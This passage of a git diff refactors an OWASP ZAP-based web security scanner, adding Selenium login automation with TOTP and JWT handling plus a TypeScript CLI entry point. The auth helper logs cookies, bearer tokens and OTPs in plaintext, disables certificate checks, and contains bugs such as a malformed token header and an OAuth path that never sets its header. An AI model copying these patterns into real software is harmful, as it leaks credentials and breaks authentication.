--- a/scripts/httpsender/request_cookies.js
+++ /dev/null
@@ -1,24 +0,0 @@
-var COOKIE_TYPE   = org.parosproxy.paros.network.HtmlParameter.Type.cookie;
-var HtmlParameter = Java.type('org.parosproxy.paros.network.HtmlParameter');
-var ScriptVars = Java.type('org.zaproxy.zap.extension.script.ScriptVars');
-
-function sendingRequest(msg, initiator, helper) {
-	// Debugging can be done using println like this
-	var cookiesStr = ScriptVars.getGlobalVar("custom_cookies");
-	var cookiesParsed = JSON.parse(cookiesStr)
-
-	// add the saved authentication token as an Authentication header and a cookie
-	var cookies = msg.getRequestHeader().getCookieParams();
-	var cookiesKeys = Object.keys(cookiesParsed)
-	for(var i = 0; i < cookiesKeys.length; i++) {
-		var key = cookiesKeys[i]
-		var cookie = new HtmlParameter(COOKIE_TYPE, key, cookiesParsed[key]);
-		cookies.add(cookie);
-	}
-	msg.getRequestHeader().setCookieParams(cookies);
-}
-
-function responseReceived(msg, initiator, helper) {
-	// Debugging can be done using println like this
-	print('responseReceived called for url=' + msg.getRequestHeader().getURI().toString())
-}
\ No newline at end of file
diff --git a/src/env.d.ts b/src/env.d.ts
new file mode 100644
index 0000000..e6a4112
--- /dev/null
+++ b/src/env.d.ts
@@ -0,0 +1,7 @@
+import { Logger } from "./utils/Logger";
+
+declare global {
+  var logger: Logger;
+}
+
+export {};
diff --git a/src/hooks/helpers/auth.py b/src/hooks/helpers/auth.py
new file mode 100644
index 0000000..b8bb6f9
--- /dev/null
+++ b/src/hooks/helpers/auth.py
@@ -0,0 +1,382 @@
+from os import environ, pathsep
+from re import search
+from time import sleep
+from traceback import print_exc
+import sys
+
+from pyotp import TOTP
+from requests import post
+from selenium import webdriver
+from selenium.webdriver.common.action_chains import ActionChains
+from selenium.webdriver.common.by import By
+from selenium.common.exceptions import NoSuchElementException, TimeoutException
+from selenium.webdriver.support import expected_conditions as EC
+from selenium.webdriver.support.ui import WebDriverWait
+from seleniumwire import webdriver
+import zap_common
+import logging
+
+from src.hooks.helpers.browserstorage import BrowserStorage
+from src.hooks.helpers.utils import array_to_dict, log
+from src.hooks.model.log_level import LogLevel
+from src.hooks.helpers.log import LoggingFilter
+from src.hooks.helpers import constants as Constants
+import src.hooks.helpers.globals as globals
+
+
+def setup_context(zap, target, config):
+    # Set an X-Scanner header so requests can be identified in logs
+    zap.replacer.add_rule(description='Scanner', enabled=True, matchtype='REQ_HEADER',
+                            matchregex=False, matchstring='X-Scanner', replacement="ZAP")
+    globals.context_id = zap.context.new_context(globals.context_name)
+
+    zap_common.context_name = globals.context_name
+    zap_common.context_id = globals.context_id
+
+    # include everything below the target
+    config.auth_include_urls.append(target + '.*')
+
+    # include additional url's
+    for include in config.auth_include_urls:
+        zap.context.include_in_context(globals.context_name, include)
+        log(f"Included {include}")
+
+    # exclude all urls that end the authenticated session
+    if len(config.auth_exclude_urls) == 0:
+        config.auth_exclude_urls.append('.*logout.*')
+        config.auth_exclude_urls.append('.*uitloggen.*')
+        config.auth_exclude_urls.append('.*afmelden.*')
+        config.auth_exclude_urls.append('.*signout.*')
+
+    for exclude in config.auth_exclude_urls:
+        zap.context.exclude_from_context(globals.context_name, exclude)
+        log(f"Excluded {exclude}")
+
+
+def setup_webdriver() -> webdriver.Chrome:
+    log('Start webdriver')
+    options = webdriver.ChromeOptions()
+    options.add_experimental_option('excludeSwitches', ['enable-logging'])
+    options.add_argument('--headless')
+    options.add_argument('--ignore-certificate-errors')
+    options.add_argument('--no-sandbox')
+    options.add_argument('--disable-dev-shm-usage')
+
+    # NOTE this is needed for the chromedriver path to be found on github actions, where the path is overridden before execution
+    if environ['CHROMEDRIVER_DIR'] not in environ['PATH']:
+        log(f"adding {environ['CHROMEDRIVER_DIR']} to path {environ['PATH']}")
+        environ["PATH"] += pathsep + environ['CHROMEDRIVER_DIR']	
+
+    driver = webdriver.Chrome(options=options)
+    driver.set_window_size(1920, 1080)
+    driver.maximize_window()
+
+    loggingFilter = LoggingFilter()
+
+    # Add the custom filter to all handlers of the root logger
+    for handler in logging.getLogger().handlers:
+        handler.addFilter(loggingFilter)
+
+    return driver
+
+def authenticate(zap, target, config):
+    skip_cleanup = False
+    try:
+        if zap is not None:
+            setup_context(zap, target, config)
+
+        if config.auth_login_url:
+            driver_instance = setup_webdriver()
+
+            login(driver_instance, config)
+
+            set_authentication(zap, target, driver_instance, config)
+        elif config.auth_bearer_token:
+            add_authorization_header(
+                zap, f"Bearer {config.auth_bearer_token}")
+        elif config.auth_token_endpoint:
+            login_from_token_endpoint(zap, config)
+        elif config.oauth_token_url:
+            login_from_oauth_token_url(zap, config)
+        else:
+            skip_cleanup = True
+            log(
+                'No login URL, Token Endpoint or Bearer token provided - skipping authentication',
+                log_level=LogLevel.WARN
+            )
+
+    except Exception:
+        log(f"error in authenticate: {print_exc()}", log_level=LogLevel.ERROR)
+    finally:
+        if config.auth_verification_url:
+            validate_authentication_url(driver_instance, config.auth_verification_url)
+        if not skip_cleanup:            
+            cleanup(driver_instance)
+
+def set_authentication(zap, target, driver, config):
+    log('Finding authentication cookies')
+    # Create an empty session for session cookies
+    if zap is not None:
+        zap.httpsessions.add_session_token(target, 'session_token')
+        zap.httpsessions.create_empty_session(target, 'auth-session')
+
+    # add all found cookies as session cookies
+    for cookie in driver.get_cookies():
+        if zap is not None:
+            zap.httpsessions.set_session_token_value(
+                target, 'auth-session', cookie['name'], cookie['value'])
+        log(f"Cookie added: {cookie['name']}={cookie['value']}")
+
+    # add token from cookies if exists
+    add_token_from_cookie(zap, driver.get_cookies())
+
+    # Mark the session as active
+    if zap is not None:
+        zap.httpsessions.set_active_session(target, 'auth-session')
+        log(f"Active session: {zap.httpsessions.active_session(target)}")
+
+    # try to find JWT tokens in Local Storage and Session Storage and add them as Authorization header
+    localStorage = BrowserStorage(driver, 'localStorage')
+    sessionStorage = BrowserStorage(driver, 'sessionStorage')
+    add_token_from_browser_storage(zap, localStorage, config)
+    add_token_from_browser_storage(zap, sessionStorage, config)
+
+def validate_authentication_url(driver, url):
+    """Validate that the authentication url is called and returns a 200 status code"""
+    log(f"Validating authentication url: {url}")
+    url_found = False
+    for request in driver.requests:
+        if request.response and url in request.url:
+            url_found = True
+            log(f"Checking response status code {request.response}")
+            if request.response.status_code != 200:
+                log(f"Status code is not 200 for {request.url}, it is {request.response.status_code}")
+                sys.exit(1)
+            else: 
+                log(f"Status code is 200 for {request.url}, authentication was successful")
+    if not url_found:
+        log(f"Authentication url {url} was not found, authentication failed.")
+        sys.exit(1)
+
+def add_token_from_browser_storage(zap, browserStorage, config):
+    """Add JWT token from browser storage as Authorization header"""
+    for key in browserStorage:
+        log(f"Found key: {key}")
+        match = search('(eyJ[^"]*)', browserStorage.get(key))
+        if match:
+            auth_header = "Bearer " + match.group()
+            add_authorization_header(zap, auth_header)
+
+def add_token_from_cookie(zap, cookies):
+    """Add JWT token from cookies as Authorization header"""
+    for cookie in cookies:
+        if cookie['name'] == 'token':
+            auth_header = "Bearer " + cookie['value']
+            add_authorization_header(zap, auth_header)
+        
+
+def login_from_token_endpoint(zap, config):
+    """Login using a token endpoint"""
+    log('Fetching authentication token from endpoint')
+    response = post(config.auth_token_endpoint, data={
+        'username': config.auth_username, 'password': config.auth_password})
+    data = response.json()
+    auth_header = None
+
+    if "token" in data:
+        auth_header = f"Bearer {data['token']}"
+    elif "token_type" in data:
+        auth_header = f"{data['token_type']} {data['token_type']}"
+
+    if auth_header:
+        add_authorization_header(zap, auth_header)
+
+def login_from_oauth_token_url(zap, config):
+    """Login using an oauth token url"""
+    log('Making request to oauth token url')
+    body = array_to_dict(config.oauth_parameters)
+    response = post(config.oauth_token_url, data=body)
+    data = response.json()
+    auth_header = None
+    if "token" in data:
+        auth_header = f"Bearer {data['token']}"
+    elif "access_token" in data:
+        log("setting access_token from oauth response")
+        auth_header = f"Bearer {data['access_token']}"
+
+def add_authorization_header(zap, auth_token):
+    """Add an authorization header to all requests using the zap replacer"""
+    if zap is not None:
+        zap.replacer.add_rule(description='AuthHeader', enabled=True, matchtype='REQ_HEADER',
+                               matchregex=False, matchstring='Authorization', replacement=auth_token)
+        log(f"Authorization header added: {auth_token}")
+
+def login(driver, config):
+    """Main function to perform logging using selenium webdriver"""
+    log(f"authenticate using webdriver against URL: {config.auth_login_url}")
+
+    driver.get(config.auth_login_url)
+    final_submit_button = config.auth_submit_field_name
+    sleep(5)
+    log('automatically finding login elements')
+
+    username_element = None
+
+    if config.auth_username:
+        username_element = fill_username(config, driver)
+
+    if config.auth_form_type == 'wait_for_password':
+        log(f"Waiting for {config.auth_password_field_name} element to load")
+        sleep(config.auth_delay_time)
+        
+    if config.auth_form_type == 'multi_page':
+        continue_button = find_element(config.auth_submit_field_name, "submit", "//*[@type='submit' or @type='button' or button]", driver)
+        actions = ActionChains(driver)
+        actions.move_to_element(continue_button).click().perform()
+        final_submit_button = config.auth_submit_second_field_name
+        log("Clicked the first submit element for multi page")
+        sleep(config.auth_delay_time)
+
+    if config.auth_password:
+        try:
+            fill_password(config, driver)
+        except Exception:
+            log(
+                'Did not find the password field - clicking Next button and trying again', log_level=LogLevel.WARN)
+
+            fill_password(config, driver)
+
+    if config.auth_otp_secret:
+        try:
+            fill_otp(config, driver)
+        except Exception:
+            log(
+                'Did not find the OTP field - clicking Next button and trying again', log_level=LogLevel.WARN)
+
+            submit_form(config.auth_submit_action,
+                                final_submit_button, config.auth_password_field_name, driver)
+            fill_otp(config, driver)
+
+    submit_form(config.auth_submit_action,
+                    final_submit_button, config.auth_password_field_name, driver)
+    
+    if config.auth_check_element:
+        try:
+            log('Check element')
+            WebDriverWait(driver, config.auth_check_delay).until(
+                EC.presence_of_element_located((By.XPATH, config.auth_check_element)))
+        except TimeoutException:
+            log('Check element timeout')
+    else:
+        sleep(config.auth_check_delay)
+
+def submit_form(submit_action, submit_field_name, password_field_name, driver):
+    """Submit the form using the submit action can either be click or submit"""
+    if submit_action == "click":
+        element = find_element(
+            submit_field_name, "submit", "//*[@type='submit' or @type='button' or button]", driver)
+        actions = ActionChains(driver)
+        actions.move_to_element(element).click().perform()
+        log(f"Clicked the {submit_field_name} element")
+    else:
+        find_element(password_field_name,"password","//input[@type='password' or contains(@name,'ass')]", driver).submit()
+        log('Submitted the form')
+
+def fill_username(config, driver):
+    """Finds and fills username field"""
+    return find_and_fill_element(config.auth_username,
+                                        config.auth_username_field_name,
+                                        "input",
+                                        "(//input[((@type='text' or @type='email') and contains(@name,'ser')) or (@type='text' or @type='email')])[1]",
+                                        driver)
+
+def fill_password(config, driver):
+    """Find and fills password field"""
+    return find_and_fill_element(config.auth_password,
+                                        config.auth_password_field_name,
+                                        "password",
+                                        "//input[@type='password' or contains(@name,'ass')]",
+                                        driver)
+
+def fill_otp(config, driver):
+    """fills """
+    totp = TOTP(config.auth_otp_secret)
+    otp = totp.now()
+
+    log(f"Generated OTP: {otp}")
+
+    return find_and_fill_element(otp,
+                                        config.auth_otp_field_name,
+                                        "input",
+                                        "//input[@type='text' and (contains(@id,'otp') or contains(@name,'otp'))]",
+                                        driver)
+
+def find_and_fill_element( value, name, element_type, xpath, driver):
+    element = find_element(name, element_type, xpath, driver)
+    element.clear()
+    element.send_keys(value)
+    log(f"Filled the {name} element")
+
+    return element
+
+    # 1. Find by ID attribute (case insensitive)
+    # 2. Find by Name attribute (case insensitive)
+    # 3. Find by xpath
+    # 4. Find by the default xpath if all above fail
+def find_element(name_or_id_or_xpath, element_type, default_xpath, driver):
+    element = None
+    log(f"Trying to find element {name_or_id_or_xpath}")
+
+    if name_or_id_or_xpath:
+        try:
+            path = build_xpath(
+                name_or_id_or_xpath, "id", element_type)
+            element = driver.find_element(By.XPATH, path)
+            log(f"Found element {name_or_id_or_xpath} by id")
+        except NoSuchElementException:
+            try:
+                path = build_xpath(
+                    name_or_id_or_xpath, "name", element_type)
+                element = driver.find_element(By.XPATH, path)
+                log(f"Found element {name_or_id_or_xpath} by name")
+            except NoSuchElementException:
+                try:
+                    element = driver.find_element(By.XPATH,
+                        name_or_id_or_xpath)
+                    log(
+                        f"Found element {name_or_id_or_xpath} by xpath (name)")
+                except NoSuchElementException:
+                    try:
+                        element = driver.find_element(By.XPATH,
+                            default_xpath)
+                        log(
+                            f"Found element {default_xpath} by default xpath")
+                    except NoSuchElementException:
+                        log(
+                            f"Failed to find the element {name_or_id_or_xpath}")
+
+    return element
+
+def build_xpath(name, find_by, element_type):
+    xpath = "translate(@{0}, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz')='{1}'".format(
+        find_by, name.lower())
+
+    if element_type == 'input':
+        xpath = "//input[({0}) and ({1})]".format(xpath,
+                                                    "@type='text' or @type='email' or @type='number' or not(@type)")
+    elif element_type == 'password':
+        xpath = "//input[({0}) and ({1})]".format(xpath,
+                                                    "@type='text' or @type='password' or not(@type)")
+    elif element_type == 'submit':
+        xpath = "//*[({0}) and ({1})]".format(xpath,
+                                                "@type='submit' or @type='button' or button")
+    else:
+        xpath = "//*[{0}]".format(xpath)
+
+    log(f"Built xpath: {xpath}")
+
+    return xpath
+
+def cleanup(driver):
+    if driver:
+        driver.quit()
diff --git a/helpers/blindxss.py b/src/hooks/helpers/blindxss.py
similarity index 91%
rename from helpers/blindxss.py
rename to src/hooks/helpers/blindxss.py
index 6f7731f..b4ca0bf 100644
--- a/helpers/blindxss.py
+++ b/src/hooks/helpers/blindxss.py
@@ -1,8 +1,9 @@
-from traceback import print_exc
-from helpers.configuration import DASTConfig
-from helpers.utils import log, read_file
 from random import randint
 from sys import exit
+from traceback import print_exc
+
+from src.hooks.helpers.configuration import DASTConfig
+from src.hooks.helpers.utils import log, read_file
 
 
 def load(config: DASTConfig, zap):
diff --git a/helpers/browserstorage.py b/src/hooks/helpers/browserstorage.py
similarity index 100%
rename from helpers/browserstorage.py
rename to src/hooks/helpers/browserstorage.py
diff --git a/helpers/configuration.py b/src/hooks/helpers/configuration.py
similarity index 92%
rename from helpers/configuration.py
rename to src/hooks/helpers/configuration.py
index f6e3223..d62f86c 100644
--- a/helpers/configuration.py
+++ b/src/hooks/helpers/configuration.py
@@ -1,11 +1,12 @@
-from helpers.constants import EMPTY_STRING
-from helpers.utils import log
-import sys
 import os
+import sys
 import traceback
 from typing import Optional, List
 
-from model.log_level import LogLevel
+from src.hooks.helpers.constants import EMPTY_STRING
+from src.hooks.helpers.utils import log
+from src.hooks.model.log_level import LogLevel
+
 
 
 class DASTConfig:
@@ -26,6 +27,7 @@ class DASTConfig:
     auth_submit_second_field_name: Optional[str] = None
     auth_check_delay: Optional[float] = None
     auth_check_element: Optional[str] = None
+    auth_verification_url: Optional[str] = None
     auth_exclude_urls: Optional[List[str]] = None
     auth_include_urls: Optional[List[str]] = None
     xss_collector: Optional[str] = None
@@ -54,13 +56,13 @@ def load_config(self, extra_zap_params):
             self.auth_bearer_token = os.environ.get('AUTH_BEARER_TOKEN') or EMPTY_STRING
             self.auth_username_field_name = os.environ.get('AUTH_USERNAME_FIELD') or 'username'
             self.auth_password_field_name = os.environ.get('AUTH_PASSWORD_FIELD') or 'password'
-            self.auth_display = os.environ.get('AUTH_DISPLAY') or EMPTY_STRING
             self.auth_otp_field_name = os.environ.get('AUTH_OTP_FIELD') or 'otp'
             self.auth_submit_field_name = os.environ.get('AUTH_SUBMIT_FIELD') or 'login'
             self.auth_submit_second_field_name =  os.environ.get('AUTH_SECOND_SUBMIT_FIELD') or 'login'
             self.auth_delay_time = float(os.environ.get('AUTH_DELAY_TIME') or 0)
             self.auth_check_delay = float(os.environ.get('AUTH_CHECK_DELAY') or 5)
             self.auth_check_element = os.environ.get('AUTH_CHECK_ELEMENT') or EMPTY_STRING
+            self.auth_verification_url = os.environ.get('AUTH_VERIFICATION_URL') or EMPTY_STRING
             self.auth_exclude_urls = self._get_hook_param_list(os.environ.get('AUTH_EXCLUDE_URLS')) or list()
             self.auth_include_urls = self._get_hook_param_list(os.environ.get('AUTH_INCLUDE_URLS')) or list()
             self.xss_collector = os.environ.get('XSS_COLLECTOR') or EMPTY_STRING
diff --git a/src/hooks/helpers/constants.py b/src/hooks/helpers/constants.py
new file mode 100644
index 0000000..02f1e1c
--- /dev/null
+++ b/src/hooks/helpers/constants.py
@@ -0,0 +1,33 @@
+EMPTY_STRING = ''
+FILE_READ_MODE = "r"
+UTF_8_ENCODING = "utf-8"
+LOG_FORMAT = "%(asctime)s %(message)s"
+ZAP_ACTIVE_SCAN_POLICY_NAME = "Default Policy"
+ZAP_AUTH_CONTEXT = "ctx-zap-docker"
+ZAP_HTTP_SENDER_SCRIPTS_FOLDER_PATH = "/home/zap/.ZAP/scripts/scripts/httpsender"
+
+FILTER_LOGS = [
+        'selenium.webdriver.common.service',
+        'selenium.webdriver.common',
+        'selenium.webdriver',
+        'selenium',
+        'selenium.webdriver.remote.remote_connection',
+        'selenium.webdriver.remote',
+        'selenium.webdriver.common.selenium_manager',
+        'selenium.webdriver.common.driver_finder',
+        'selenium.webdriver.firefox.webdriver',
+        'selenium.webdriver.firefox',
+        'seleniumwire.storage',
+        'seleniumwire',
+        'seleniumwire.utils',
+        'seleniumwire.handler',
+        'seleniumwire.thirdparty.mitmproxy.server.protocol.http',
+        'seleniumwire.thirdparty.mitmproxy.server.protocol',
+        'seleniumwire.thirdparty.mitmproxy.server',
+        'seleniumwire.thirdparty.mitmproxy',
+        'seleniumwire.thirdparty',
+        'seleniumwire.server',
+        'seleniumwire.backend',
+        'hpack.hpack',
+        'hpack.table'
+]
\ No newline at end of file
diff --git a/helpers/custom_cookies.py b/src/hooks/helpers/custom_cookies.py
similarity index 81%
rename from helpers/custom_cookies.py
rename to src/hooks/helpers/custom_cookies.py
index 60523f1..e257d45 100644
--- a/helpers/custom_cookies.py
+++ b/src/hooks/helpers/custom_cookies.py
@@ -2,9 +2,9 @@
 import traceback
 import json
 
-from helpers.configuration import DASTConfig
-from helpers.constants import ZAP_HTTP_SENDER_SCRIPTS_FOLDER_PATH
-from helpers.utils import log, process_custom_cookie_header_data
+from src.hooks.helpers.configuration import DASTConfig
+from src.hooks.helpers.constants import ZAP_HTTP_SENDER_SCRIPTS_FOLDER_PATH
+from src.hooks.helpers.utils import log, process_custom_cookie_header_data
 
 
 def load(config: DASTConfig, zap):
diff --git a/helpers/custom_headers.py b/src/hooks/helpers/custom_headers.py
similarity index 84%
rename from helpers/custom_headers.py
rename to src/hooks/helpers/custom_headers.py
index ddc1eb5..0ff1bca 100644
--- a/helpers/custom_headers.py
+++ b/src/hooks/helpers/custom_headers.py
@@ -1,8 +1,8 @@
 import sys
 import traceback
 
-from helpers.configuration import DASTConfig
-from helpers.utils import log, process_custom_cookie_header_data
+from src.hooks.helpers.configuration import DASTConfig
+from src.hooks.helpers.utils import log, process_custom_cookie_header_data
 
 
 def load(config: DASTConfig, zap):
diff --git a/src/hooks/helpers/globals.py b/src/hooks/helpers/globals.py
new file mode 100644
index 0000000..00a4900
--- /dev/null
+++ b/src/hooks/helpers/globals.py
@@ -0,0 +1,6 @@
+from src.hooks.helpers.constants import ZAP_AUTH_CONTEXT
+def initialize(): 
+    global context_name
+    global context_id
+    context_name = ZAP_AUTH_CONTEXT
+    context_id = None
\ No newline at end of file
diff --git a/helpers/log.py b/src/hooks/helpers/log.py
similarity index 72%
rename from helpers/log.py
rename to src/hooks/helpers/log.py
index 507dabc..dad1151 100644
--- a/helpers/log.py
+++ b/src/hooks/helpers/log.py
@@ -1,12 +1,13 @@
 """
 Logger classes for the ZAP CLI.
 """
-
 import logging
 import sys
-from helpers import constants as Constants
 
 from termcolor import colored
+from datetime import datetime
+
+from src.hooks.helpers import constants as Constants
 
 
 class ColorStreamHandler(logging.StreamHandler):
@@ -44,6 +45,13 @@ def emit(self, record):
         record.msg = prefix + record.msg
 
         logging.StreamHandler.emit(self, record)
+class CustomFormatter(logging.Formatter):
+    """Custom Formatter to match the TypeScript timestamp style."""
+
+    def formatTime(self, record, datefmt=None):
+        utc_time = datetime.utcfromtimestamp(record.created)
+        t = utc_time.strftime("%Y-%m-%d %I:%M:%S %p")
+        return f"{t} UTC"
 
 
 class ConsoleLogger(logging.Logger):
@@ -53,18 +61,21 @@ def __init__(self, name):
         super(ConsoleLogger, self).__init__(name)
         self.setLevel(logging.DEBUG)
         handler = ColorStreamHandler(sys.stdout)
-        handler.setFormatter(logging.Formatter(fmt=Constants.LOG_FORMAT, datefmt="%m/%d/%Y %I:%M:%S %p %Z"))
+        formatter = CustomFormatter(fmt=Constants.LOG_FORMAT)
+        handler.setFormatter(formatter)
         self.addHandler(handler)
         self.propagate = False
 
+class LoggingFilter(logging.Filter):
+    """Filter out logs from the console logger."""
 
-# Save the current logger
+    def filter(self, record):
+        return record.name not in Constants.FILTER_LOGS
+    
 default_logger_class = logging.getLoggerClass()
 
-# Console logging for CLI
 logging.setLoggerClass(ConsoleLogger)
 console = logging.getLogger("SOOS DAST")
-console.setLevel(level=logging.INFO)
+console.setLevel(logging.INFO)
 
-# Restore the previous logger
 logging.setLoggerClass(default_logger_class)
diff --git a/helpers/requestheaders.py b/src/hooks/helpers/requestheaders.py
similarity index 100%
rename from helpers/requestheaders.py
rename to src/hooks/helpers/requestheaders.py
diff --git a/src/hooks/helpers/utils.py b/src/hooks/helpers/utils.py
new file mode 100644
index 0000000..34578a9
--- /dev/null
+++ b/src/hooks/helpers/utils.py
@@ -0,0 +1,71 @@
+from sys import exit
+from typing import Dict, Iterable, NoReturn
+
+from requests import Response
+from requests.exceptions import HTTPError
+
+import src.hooks.helpers.constants as Constants
+from src.hooks.model.log_level import LogLevel, loggerFunc
+from src.hooks.model.target_availability_check import TargetAvailabilityCheck
+
+
+UTF_8: str = 'utf-8'
+
+def log(message: str, log_level: LogLevel = LogLevel.INFO) -> None:
+    logFunc = loggerFunc.get(log_level)
+    logFunc(str(message))
+
+
+def print_line_separator() -> None:
+    print(
+        "----------------------------------------------------------------------------------------------------------"
+    )
+
+
+def exit_app(e) -> NoReturn:
+    log(str(e), LogLevel.ERROR)
+    exit(1)
+
+
+def _check_status(response: Response) -> TargetAvailabilityCheck:
+    try:
+        response.raise_for_status()
+    except HTTPError as error:
+        log(f"{type(error).__name__}: {response.status_code}")
+        log(response.text, log_level=LogLevel.DEBUG)
+
+        # 401 status indicates the host is available but may be behind basic auth
+        if response.status_code == 401:
+            return TargetAvailabilityCheck(True, response=response)
+
+        return TargetAvailabilityCheck(
+            False,
+            response=response,
+            unavailable_reason=error,
+        )
+    else:
+        return TargetAvailabilityCheck(True, response=response)
+
+
+def process_custom_cookie_header_data(data: str) -> Dict:
+    values: Dict = dict()
+
+    if data is not None:
+        dataModified = data.replace('[', Constants.EMPTY_STRING).replace(']', Constants.EMPTY_STRING)
+        for value in dataModified.split(','):
+            dict_key, dict_value = value.split(':')
+            values[dict_key] = dict_value
+
+    return values
+
+def read_file(file_path):
+    with open(file=file_path, mode=Constants.FILE_READ_MODE, encoding=Constants.UTF_8_ENCODING) as file:
+        return file.read()
+
+def array_to_dict(array: Iterable[str]):
+    body = []
+    for key_value in array:
+        print(key_value)
+        key, value = key_value.split(':', 1)
+        body.append((key, value))
+    return body
\ No newline at end of file
diff --git a/model/log_level.py b/src/hooks/model/log_level.py
similarity index 90%
rename from model/log_level.py
rename to src/hooks/model/log_level.py
index b4c7f98..892708c 100644
--- a/model/log_level.py
+++ b/src/hooks/model/log_level.py
@@ -1,7 +1,7 @@
 from enum import Enum
 from logging import DEBUG, INFO, WARN, ERROR, CRITICAL
 
-from helpers.log import console
+from src.hooks.helpers.log import console
 
 
 class LogLevel(Enum):
diff --git a/model/target_availability_check.py b/src/hooks/model/target_availability_check.py
similarity index 100%
rename from model/target_availability_check.py
rename to src/hooks/model/target_availability_check.py
diff --git a/requirements.txt b/src/hooks/requirements.txt
similarity index 56%
rename from requirements.txt
rename to src/hooks/requirements.txt
index 464e2f8..4b0511f 100644
--- a/requirements.txt
+++ b/src/hooks/requirements.txt
@@ -5,5 +5,6 @@ termcolor
 six
 python-owasp-zap-v2.4
 bleach
-selenium==3.141.0
-pyotp==2.6.0
\ No newline at end of file
+selenium==4.14.0
+pyotp==2.6.0
+selenium-wire==5.1.0
diff --git a/hooks/soos_dast_hook.py b/src/hooks/soos_zap_hook.py
similarity index 74%
rename from hooks/soos_dast_hook.py
rename to src/hooks/soos_zap_hook.py
index 202f936..979d356 100644
--- a/hooks/soos_dast_hook.py
+++ b/src/hooks/soos_zap_hook.py
@@ -1,13 +1,15 @@
-from helpers.auth import DASTAuth
-from helpers.configuration import DASTConfig
-import helpers.custom_cookies as cookies
-import helpers.custom_headers as headers
-import helpers.constants as Constants
 import sys
 import traceback
-from helpers.utils import log, exit_app
 from typing import List
 
+from src.hooks.helpers.auth import authenticate
+from src.hooks.helpers.configuration import DASTConfig
+from src.hooks.helpers.utils import log, exit_app
+from src.hooks.helpers import custom_cookies as cookies
+from src.hooks.helpers import custom_headers as headers
+from src.hooks.helpers import constants as Constants
+import src.hooks.helpers.globals as globals
+
 config = DASTConfig()
 
 
@@ -15,14 +17,14 @@
 def start_docker_zap(docker_image, port, extra_zap_params, mount_dir):
     config.load_config(extra_zap_params)
 
-
 # Triggered when running from the Docker image
 def start_zap(port, extra_zap_params):
     config.load_config(extra_zap_params)
 
 
 def zap_started(zap, target):
-    log(f"zap_started_hook is running")
+    log("zap_started_hook is running")
+    globals.initialize()
     try:
         # ZAP Docker scripts reset the target to the root URL
         if target.count('/') > 2:
@@ -38,8 +40,7 @@ def zap_started(zap, target):
             zap.ascan.disable_scanners(','.join(ascan_disabled_rules), Constants.ZAP_ACTIVE_SCAN_POLICY_NAME)
             log(f"disabled rules: {config.disable_rules}")
 
-        auth = DASTAuth(config)
-        auth.authenticate(zap, target)
+        authenticate(zap, target, config)
         cookies.load(config, zap)
         headers.load(config, zap)
     except Exception:
@@ -48,6 +49,11 @@ def zap_started(zap, target):
 
     return zap, target
 
+def zap_import_context(zap, context_file):
+    log("zap_import_context_hook is running")
+    log(f"importing context from file: {context_file}")
+    zap.context.remove_context(globals.context_name)
+
 def zap_pre_shutdown(zap):
     log("Overview of spidered URL's:")
     with open('spidered_urls.txt', 'w') as f:
diff --git a/src/index.ts b/src/index.ts
new file mode 100644
index 0000000..546bdf4
--- /dev/null
+++ b/src/index.ts
@@ -0,0 +1,544 @@
+import { ZapCommandGenerator } from "./utils/ZapCommandGenerator";
+import * as fs from "fs";
+import FormData from "form-data";
+import { spawn, execSync } from "child_process";
+import { Logger } from "./utils/Logger";
+import { convertStringToB64, getEnvVariable, isUrlAvailable } from "./utils/utilities";
+import {
+  AUTH_DELAY_TIME,
+  DAST_TOOL,
+  DAST_TOOL_VERSION,
+  REPORT_SCAN_RESULT_FILE,
+  SOOS_API_KEY_ENV_VAR,
+  SOOS_CLIENT_ID_ENV_VAR,
+  SPIDERED_URLS_FILE_PATH,
+} from "./utils/constants";
+import { ArgumentParser } from "argparse";
+import {
+  ApiScanFormat,
+  FormTypes,
+  LogLevel,
+  OnFailure,
+  OutputFormat,
+  ScanMode,
+  SubmitActions,
+} from "./utils/enums";
+import { exit } from "process";
+import SOOSAnalysisApiClient from "@soos-io/api-client/dist/api/SOOSAnalysisApiClient";
+import { ScanStatus, ScanType, soosLogger } from "@soos-io/api-client";
+
+export interface SOOSDASTAnalysisArgs {
+  apiKey: string;
+  apiURL: string;
+  appVersion: string;
+  branchName: string;
+  branchUri: string;
+  buildUri: string;
+  buildVersion: string;
+  clientId: string;
+  commitHash: string;
+  integrationName: string;
+  integrationType: string;
+  logLevel: LogLevel;
+  onFailure: OnFailure;
+  operatingEnvironment: string;
+  projectName: string;
+  scriptVersion: string;
+  targetURL: string;
+  scanMode: ScanMode;
+  debug: boolean;
+  ajaxSpider: boolean;
+  contextFile: string;
+  fullScanMinutes: number;
+  apiScanFormat: ApiScanFormat;
+  authUsername: string;
+  authPassword: string;
+  authLoginURL: string;
+  authUsernameField: string;
+  authPasswordField: string;
+  authSubmitField: string;
+  authSecondSubmitField: string;
+  authSubmitAction: SubmitActions;
+  authFormType: FormTypes;
+  authDelayTime: number;
+  authVerificationURL: string;
+  requestCookies: string;
+  requestHeaders: string;
+  reportRequestHeaders: boolean;
+  bearerToken: string;
+  oauthTokenUrl: string;
+  oauthParameters: string;
+  updateAddons: boolean;
+  disableRules: string;
+  otherOptions: string;
+  verbose: boolean;
+  outputFormat: OutputFormat;
+  checkoutDir: string;
+}
+class SOOSDASTAnalysis {
+  constructor(private args: SOOSDASTAnalysisArgs) {}
+
+  static parseArgs(): SOOSDASTAnalysisArgs {
+    const parser = new ArgumentParser({ description: "SOOS DAST" });
+
+    parser.add_argument("targetURL", {
+      help: "Target URL - URL of the site or api to scan. The URL should include the protocol. Ex: https://www.example.com",
+    });
+
+    parser.add_argument("--clientId", {
+      help: "SOOS Client ID - get yours from https://app.soos.io/integrate/sca",
+      default: getEnvVariable(SOOS_CLIENT_ID_ENV_VAR),
+      required: false,
+    });
+
+    parser.add_argument("--apiKey", {
+      help: "SOOS API Key - get yours from https://app.soos.io/integrate/sca",
+      default: getEnvVariable(SOOS_API_KEY_ENV_VAR),
+      required: false,
+    });
+
+    parser.add_argument("--projectName", {
+      help: "Project Name - this is what will be displayed in the SOOS app.",
+      required: true,
+    });
+
+    parser.add_argument("--scanMode", {
+      help: "Scan Mode - Available modes: baseline, fullscan, and apiscan (for more information about scan modes visit https://github.com/soos-io/soos-dast#scan-modes)",
+      default: ScanMode.Baseline,
+      required: false,
+      type: (value: string) => {
+        if (Object.values(ScanMode).includes(value as ScanMode)) {
+          return value as ScanMode;
+        } else {
+          throw new Error(`Invalid scan mode: ${value}`);
+        }
+      },
+    });
+
+    parser.add_argument("--debug", {
